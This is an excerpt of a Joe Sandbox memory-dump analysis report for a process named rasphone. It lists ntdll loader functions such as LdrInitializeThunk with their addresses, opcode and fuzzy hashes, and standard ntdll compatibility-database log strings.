                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 73eda3413396c6f46379454e68d637dc776d6d4f4b54597b64439d1e745791f0
                                                  • Instruction ID: 00acd99af8240724d55b62cdb4da837f24c661428c6fc6d0d0acf81c50adb2fc
                                                  • Opcode Fuzzy Hash: 73eda3413396c6f46379454e68d637dc776d6d4f4b54597b64439d1e745791f0
                                                  • Instruction Fuzzy Hash: 88900221231C0142FA0075684D14B07004587D2347F55CA59A114E554CC935DC657531
                                                  Function 048829F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 279 48829f0-48829fc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 58efe443e9e8f4f0600817424050096ca1e216ab69709ad6f0eb829b3ab617fc
                                                  • Instruction ID: 216001d8353e20e09021a61e1266b89b17c7501b615be6ab8ffc62f980c80eaa
                                                  • Opcode Fuzzy Hash: 58efe443e9e8f4f0600817424050096ca1e216ab69709ad6f0eb829b3ab617fc
                                                  • Instruction Fuzzy Hash: 85900225231401032905B5580704507008687D7395355C965F200F550CD631DC657131
                                                  Function 04882A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 281 4882a80-4882a8c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: bd1959480f764e65afb626820c3cd4e63210f9b834224476dcb7deb7c9e83126
                                                  • Instruction ID: 313b82c528e8cc617715be784e1e29d661080df0effd4cfa0a7a5531662281ac
                                                  • Opcode Fuzzy Hash: bd1959480f764e65afb626820c3cd4e63210f9b834224476dcb7deb7c9e83126
                                                  • Instruction Fuzzy Hash: ED90026122240103690571584514616404A87E2245B55C965E200E590DC535DC957135
                                                  Function 04882AC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 282 4882ac0-4882acc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ef10b8b98df4ec5fb587209c60bf9cf102abb858b738d942f4d138b74d93bd0f
                                                  • Instruction ID: 2a4592af92780c7e2a95f471d8f45795a173ef95dffd7264acb97a7a25b5795a
                                                  • Opcode Fuzzy Hash: ef10b8b98df4ec5fb587209c60bf9cf102abb858b738d942f4d138b74d93bd0f
                                                  • Instruction Fuzzy Hash: C690023162540902F95071584514746004587D2345F55C955A101E654DC775DE5976B1
                                                  Function 04882A10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 280 4882a10-4882a1c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 085eaefbce85afd7df95dccf68e3f2a90ddebbedb908059baf718d76ad602c5f
                                                  • Instruction ID: 3b95c07df022c7a92d2d7507f3f57f4743592d10a81c9bccc9868d21f06ce770
                                                  • Opcode Fuzzy Hash: 085eaefbce85afd7df95dccf68e3f2a90ddebbedb908059baf718d76ad602c5f
                                                  • Instruction Fuzzy Hash: 2F900225231401022945B558070450B048597D7395395C959F240F590CC631DC697331
                                                  Function 04882B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 285 4882b80-4882b8c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: e6ac984f399e9313540ac33309277b7eb45da2ca89ac248ac50dd37caff483c4
                                                  • Instruction ID: 74c9761d202d80bb7bbe1198b0cb9438be89e66480736b592799a43fbc8adadc
                                                  • Opcode Fuzzy Hash: e6ac984f399e9313540ac33309277b7eb45da2ca89ac248ac50dd37caff483c4
                                                  • Instruction Fuzzy Hash: 5E90023122140942F90071584504B46004587E2345F55C95AA111E654DC635DC557531
                                                  Function 04882B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 286 4882b90-4882b9c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: dcb710e27b89883299d6a10fd4bdf110a045ca6d567023cbd62b9cb6a9bb1f16
                                                  • Instruction ID: 3eb2d4fd51c47445ec2d7dd20514ca7a3b7daa2615aadeeeb518f00383497964
                                                  • Opcode Fuzzy Hash: dcb710e27b89883299d6a10fd4bdf110a045ca6d567023cbd62b9cb6a9bb1f16
                                                  • Instruction Fuzzy Hash: 4F90023122148902F9107158850474A004587D2345F59CD55A541E658DC6B5DC957131
                                                  Function 04882BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 287 4882bc0-4882bcc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: dd62924c4cc5ad1bd9295647f68e396546d50f5b3f9cc269d77ad68f342ec001
                                                  • Instruction ID: 3dc4f8e8f5f609aa9b57763ed3c314444d5e40c20fd0bdb8a5e0c1e236af010c
                                                  • Opcode Fuzzy Hash: dd62924c4cc5ad1bd9295647f68e396546d50f5b3f9cc269d77ad68f342ec001
                                                  • Instruction Fuzzy Hash: E890023122140502F90075985508646004587E2345F55D955A601E555EC675DC957131
                                                  Function 04882B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 283 4882b00-4882b0c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 0aa875fc5f3272b08af41c315bbf488169497c7ec992847d345c9f7815d67d3f
                                                  • Instruction ID: 3cf82fc7b040275fc88b078274850a3048b1f6f7b2eccf2c55cc5ac1190d65d1
                                                  • Opcode Fuzzy Hash: 0aa875fc5f3272b08af41c315bbf488169497c7ec992847d345c9f7815d67d3f
                                                  • Instruction Fuzzy Hash: DC90023122544942F94071584504A46005587D2349F55C955A105E694DD635DD59B671
                                                  Function 04882B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 284 4882b10-4882b1c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a6e2cf6df11c45b772e12ccaad870be698bc6f60ce3d14ab62d0efa45f588540
                                                  • Instruction ID: 36e431ba2f087d3fb81edd06828fe1ed582ed688c7be46491e0df396e3e34716
                                                  • Opcode Fuzzy Hash: a6e2cf6df11c45b772e12ccaad870be698bc6f60ce3d14ab62d0efa45f588540
                                                  • Instruction Fuzzy Hash: 0990023122140902F9807158450464A004587D3345F95C959A101F654DCA35DE5D77B1
                                                  Function 048834E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 4be672dffd9fc10abfe60c40ba31e001b4c6512b7c001f6e7a2966902dde676e
                                                  • Instruction ID: 1f26296beebadcc4c053ea9f73030f249212c301117f025e63507f8384d98e2f
                                                  • Opcode Fuzzy Hash: 4be672dffd9fc10abfe60c40ba31e001b4c6512b7c001f6e7a2966902dde676e
                                                  • Instruction Fuzzy Hash: 6290023162550502F90071584614706104587D2245F65CD55A141E568DC7B5DD5575B2
                                                  Function 04882B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 275 4882b2a-4882b2f 276 4882b3f-4882b46 LdrInitializeThunk 275->276 277 4882b31-4882b38 275->277
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: d31ef07871aede2fd5d2b18afc9fde7c53d82778d3f81ec10578f7297df8040b
                                                  • Instruction ID: d869d19fbb11a09361c49cd700a31fea17c081b285286a1ea446305b3f24e655
                                                  • Opcode Fuzzy Hash: d31ef07871aede2fd5d2b18afc9fde7c53d82778d3f81ec10578f7297df8040b
                                                  • Instruction Fuzzy Hash: 44B02B318024C2C5FF00FB20070C707394067C1300F15C995D2028240E4338D090F231

                                                  Non-executed Functions

                                                  Function 04877550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 048B4507
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 048B4530
                                                  • ExecuteOptions, xrefs: 048B44AB
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 048B4592
                                                  • Execute=1, xrefs: 048B451E
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 048B454D
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 048B4460
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 0-484625025
                                                  • Opcode ID: c60751e2ddcf51b03cdea124699fd7ce83afb9ecdde3a6736d284cc3bc3f8935
                                                  • Instruction ID: f80d7e0ccf46dcb23a7bc2ef2e85a77c1462dd6f6fe25e3359cbe1b4552fc992
                                                  • Opcode Fuzzy Hash: c60751e2ddcf51b03cdea124699fd7ce83afb9ecdde3a6736d284cc3bc3f8935
                                                  • Instruction Fuzzy Hash: 3851D871A002196AEB10AF98DCA5FA977A8EF04708F140FE9D505E7291E7B0FE45CF51
                                                  Function 04849046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$@
                                                  • API String ID: 0-1194432280
                                                  • Opcode ID: f0cd3a7d75b4a4d219d67bfcc9266b03005870fce03d8c3399c866aed412db9f
                                                  • Instruction ID: 3728f14a10458d2d64485578cc05fabd1438d949f00e1c00c5b0399e18456836
                                                  • Opcode Fuzzy Hash: f0cd3a7d75b4a4d219d67bfcc9266b03005870fce03d8c3399c866aed412db9f
                                                  • Instruction Fuzzy Hash: D5812DB1D012699BEB31DF54CC44BEEB6B4AB44714F0046EAE909F7250E7B06E84DFA1